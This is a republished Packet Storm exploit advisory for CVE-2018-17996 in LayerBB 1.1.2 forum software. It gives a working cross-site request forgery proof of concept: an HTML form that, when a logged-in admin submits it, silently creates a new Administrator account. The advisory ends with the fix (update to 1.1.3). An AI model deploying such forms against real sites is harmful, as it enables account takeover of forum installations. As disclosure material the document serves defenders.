LayerBB 1.1.2 Cross Site Request Forgery

🗓️ 15 Feb 2019 00:00:00Reported by 0xB9Type

packetstorm🔗 packetstormsecurity.com👁 23 Views

LayerBB 1.1.2 - Cross-Site Request Forgery allows creation of admin use

Reporter	Title	Published	Views	Family All 7
CVE	CVE-2018-17996	17 Mar 201918:56	–	cve
Cvelist	CVE-2018-17996	17 Mar 201918:56	–	cvelist
Exploit DB	LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)	14 Feb 201900:00	–	exploitdb
EUVD	EUVD-2018-9735	7 Oct 202500:30	–	euvd
exploitpack	LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)	14 Feb 201900:00	–	exploitpack
NVD	CVE-2018-17996	21 Mar 201916:00	–	nvd
Prion	Cross site request forgery (csrf)	21 Mar 201916:00	–	prion

`# Exploit Title: LayerBB 1.1.2 - Cross-Site Request Forgery  
# Date: 10/4/2018  
# Author: 0xB9  
# Twitter: @0xB9Sec  
# Contact: 0xB9[at]pm.me  
# Software Link: https://forum.layerbb.com  
# Version: 1.1.2  
# Tested on: Ubuntu 18.04  
# CVE: CVE-2018-17996  
  
  
1. Description:  
LayerBB is a free open-source forum software, the CSRF allows creating a admin user.  
  
  
2. Proof of Concept:  
  
<!-- Create Admin User -->   
<html>  
<body>  
<form action="http://localhost/[path]/admin/new_user.php" method="POST">  
<label for="username">Username</label>  
<input name="username" id="username" value="test" type="text">  
<label for="password">Password</label>  
<input name="password" id="password" value="password123" type="password">  
<label for="email">Email Address</label>  
<input name="email" id="email" value="[email protected]" type="text">   
<label for="usergroup">Usergroup</label><br>  
<select name="usergroup" id="usergroup" style="width:100%;"><option value="4">Administrator</option></select><br><br>  
<input name="create" value="Create User" type="submit">  
</form>  
</body>  
</html>  
<!-- Create Admin User End -->  
  
  
3. Solution:  
Update to 1.1.3  
`

15 Feb 2019 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.03011